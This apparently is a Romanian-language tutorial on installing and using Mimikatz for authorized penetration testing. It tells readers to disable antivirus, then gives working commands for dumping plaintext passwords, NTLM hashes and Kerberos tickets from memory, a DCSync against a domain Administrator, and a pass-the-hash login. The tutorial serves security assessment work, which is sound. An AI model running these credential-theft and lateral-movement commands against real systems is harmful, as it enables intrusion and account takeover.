Introducere

Mimikatz este un instrument puternic conceput pentru a extrage parole, hașuri, coduri PIN și bilete Kerberos din memorie în text clar. Acesta este utilizat pe scară largă de către testerele de penetrare și profesioniștii din domeniul securității pentru a evalua vulnerabilitățile sistemului. Acest ghid oferă o abordare pas cu pas a instalării și utilizării Mimikatz pentru testarea etică a securității.

Avertisment: Utilizarea neautorizată a Mimikatz este ilegală. Asigurați-vă că aveți permisiunea explicită înainte de a-l utiliza în orice mediu.

Condiții prealabile

Înainte de a instala Mimikatz, asigurați-vă că dispuneți de următoarele:

  • O mașină Windows (Windows 7, 10, 11 sau Server)

  • Privilegii de administrator

  • Windows Defender și orice software antivirus dezactivat (Mimikatz este adesea marcat ca malware)

Descărcarea Mimikatz

Mimikatz este un instrument open-source disponibil pe GitHub. Pentru a-l descărca:

  1. Deschideți browserul web și accesați
    https://github.com/gentilkiwi/mimikatz

  2. Faceți clic pe Code > Download ZIP.

  3. Extrageți fișierul ZIP într-un director la alegere.

De asemenea, puteți clona depozitul utilizând Git:

git clone https://github.com/gentilkiwi/mimikatz.git

Rularea Mimikatz

Deoarece Mimikatz necesită privilegii de administrator, urmați acești pași:

  1. Deschideți Command Prompt sau PowerShell ca administrator.

  2. Navigați la folderul în care ați extras Mimikatz:

    cd pathtomimikatzx64

  3. Lansați Mimikatz:

    mimikatz.exe

Ar trebui să vedeți acum interfața de linie de comandă cu promptul:
mimikatz #

Comenzi de bază Mimikatz

1. Verificarea privilegiilor sistemului

Înainte de a extrage acreditările, verificați dacă aveți suficiente privilegii:

privilege::debug

În caz de succes, ar trebui să vedeți:
Privilegiul ’20’ OK

Extragerea parolelor din memorie

Pentru a extrage parolele stocate în memorie, utilizați:

sekurlsa::logonpasswords

Aceasta va afișa numele de utilizator, domeniile și parolele în text clar, dacă sunt disponibile.

Descărcarea hașurilor NTLM

Hashes-urile NTLM pot fi utilizate pentru atacuri de tip pass-the-hash. Pentru a le extrage:

lsadump::sam

Sau pentru sisteme la distanță:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

Dump Kerberos Tickets

Pentru a extrage biletele Kerberos din sistem:

sekurlsa::tickets /export

Aceasta exportă fișiere .kirbi, care pot fi utilizate în atacuri de tip pass-the-ticket.

Atacul Pass-the-Hash

Pentru a vă autentifica utilizând un hash NTLM în locul unei parole:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>

Concluzie

Mimikatz rămâne unul dintre cele mai puternice instrumente de evaluare a securității sistemelor Windows datorită capacității sale de a extrage parole, hash-uri și bilete Kerberos direct din memorie. Atunci când este utilizat în mod responsabil și etic, acesta ajută profesioniștii să identifice vulnerabilitățile, să verifice configurațiile infrastructurii de domeniu și să îmbunătățească postura generală de securitate a unei organizații. Cu toate acestea, este esențial să ne amintim că instrumente precum Mimikatz trebuie utilizate numai cu autorizație oficială și în medii controlate, deoarece utilizarea neautorizată încalcă legea și poate avea consecințe grave.